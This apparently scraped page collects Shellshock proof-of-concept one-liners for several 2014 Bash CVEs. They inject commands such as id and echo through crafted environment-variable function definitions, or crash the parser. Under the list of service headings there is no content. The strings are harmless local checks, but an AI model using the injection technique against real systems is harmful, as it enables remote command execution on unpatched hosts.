Shellshocker Proof of Concept collection

Command Line (Linux, OSX, and Windows via Cygwin)

  • bashcheck – script to test for the latest vulns

CVE-2014-6271

  • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

Creates a file named echo in the current working directory with the date in it, if vulnerable.

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

  • () { _; } >_[$($())] { echo hi mom; id; }

CVE-2014-6277

will segfault if vulnerable

IBM z/OS –

HTTP

Phusion Passenger

DHCP

SSH

OSX

SIP

Qmail

Postfix

FTP

OpenVPN

Oracle

TMNT

Hand

Speculation:(Non-confirmed possibly vulnerable)

OFFICIAL SOURCE